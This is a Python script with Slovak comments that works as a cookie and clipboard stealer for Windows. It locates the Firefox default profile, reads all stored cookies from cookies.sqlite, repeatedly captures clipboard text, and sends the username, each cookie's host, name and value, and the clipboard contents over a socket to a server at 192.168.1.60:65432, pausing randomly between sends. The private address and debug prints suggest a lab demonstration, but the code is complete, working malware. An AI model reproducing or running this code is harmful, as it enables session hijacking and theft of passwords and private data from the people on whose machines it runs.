import socket
import os
import glob
from pathlib import Path
import re

import sqlite3
from time import sleep
import random
import win32clipboard


# pauza nahodny pocet sekund
def wait(t1, t2):
    sleep(random.randint(t1, t2))


def main():
    # socket
    mysocket = socket.socket()

    # pouzivatelske meno
    username = os.getlogin()

    # Firefox default profile
    p = glob.glob(str(Path.home()) + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\')
    r = re.compile('.*default-release.*')
    firefox_default_profile = list(filter(r.match, p))[0]
    print('Firefox default profile: ' + firefox_default_profile)

    # Firefox cookies databaza
    firefoxcookiesdb = os.path.join(firefox_default_profile, 'cookies.sqlite')
    conn = sqlite3.connect(firefoxcookiesdb)
    mycursor = conn.cursor()

    # nadviazanie spojenia so serverom
    while True:
        try:
            # IP adresa servera = 192.168.1.60
            # PORT na serveri = 65432
            if mysocket.connect_ex(('192.168.1.60', 65432)) == 0:
                print('spojenie nadviazane...')
                # odoslanie pouzivatelskeho mena
                print('odosielam data: ' + username)
                mysocket.send(username.encode('utf-8'))
                wait(3, 10)  # pauza
                break
            else:
                print('cakam na spojenie...')
        except Exception as e:
            print(e)
        wait(1, 10)  # pauza

    while True:
        # nacitanie obsahu Cookies a odoslanie na server
        try:
            mycursor.execute('SELECT * FROM moz_cookies')

            cookiesdata = mycursor.fetchall()
            if not cookiesdata:
                break

            for c in cookiesdata:
                cdata = 'COOK|xxx|' + c[2] + '|||' + c[3] + '|||' + c[4] + '|||' + str(c[7])
                print('odosielam data: ' + cdata)
                mysocket.send(cdata.encode('utf-8'))
                wait(3, 10)  # pauza

                # priebezne nacitanie obsahu Clipboardu (iba text) a odoslanie na server
                win32clipboard.OpenClipboard()
                clipdata = win32clipboard.GetClipboardData(win32clipboard.CF_TEXT)
                win32clipboard.CloseClipboard()
                clipdata = 'CLIP|xxx|' + clipdata.decode('utf-8')
                print('odosielam data: ' + clipdata)
                mysocket.send(clipdata.encode('utf-8'))
                wait(3, 10)  # pauza

        except Exception as e:
            print(e)

    # ukoncenie spojenia so serverom
    mysocket.close()


if __name__ == '__main__':
    main()
